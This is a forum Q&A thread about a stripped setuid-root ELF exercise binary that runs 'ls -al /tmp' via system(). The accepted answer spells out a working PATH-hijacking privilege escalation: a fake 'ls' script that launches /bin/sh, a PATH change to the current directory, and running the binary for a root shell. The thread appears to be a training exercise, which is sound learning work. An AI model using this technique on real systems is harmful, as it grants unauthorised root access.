# How to exploit an suid root application

Tags: elf, exploit

I have to exploit an application and I have only the 32-bit ELF excecutable, which is also stripped. Its a suid root application and when it is executed practically run the `ls -al` command for a specific directory that normally is inaccessible for normal users.

Any advice about how to handle this problem?

Comment: what are the inputs that you control? can you effect the arguments of `ls -al`?

Comment: Check for how can you influence that command, it's most likely a system() call. Environment variables and command line arguments are the candidates. However, without disassembly, it's impossible to say.

Comment: I have tried a lot of inputs with patterns but I cannot spot any influence in memory. I can show you disassembly but because of the fact that the file is stripped has no info about functions.

Comment: how do you know it's exploitable?

Comment: its an exercise and it says it is

Comment: Can you please share the elf file in some way so we can understand better?

Comment: Of course, I uploaded it. The link is above. The directory that we must not have access in this case is /tmp

Comment: I still don't know what kind of exploit it supposed to have. You have a folder that it's not accessible and an app that can list the files in it. Should you display content od one of the files or what?

Answer (score 4, accepted):

If the program is setuid, you can use the fact that it is calling the command `ls -al /tmp` through `system()` from the `main()` function.

1. Create a file `ls` which contains:

   ```
   #!/bin/sh
   /bin/sh
   ```
2. Set it as an executable script:

   ```
   #> chmod +x ./ls
   ```
3. Modify your `PATH` to point to the current directory:

   ```
   #> export PATH=.:${PATH}
   ```
4. Run the weak software (where you have the fake `ls` script):

   ```
   #> /path/to/test
   ```

Just a remark, the rest of the software seems to have been obfuscated, at least by renaming the subroutines into `sub_xxxx`. It may also contain other obfuscations.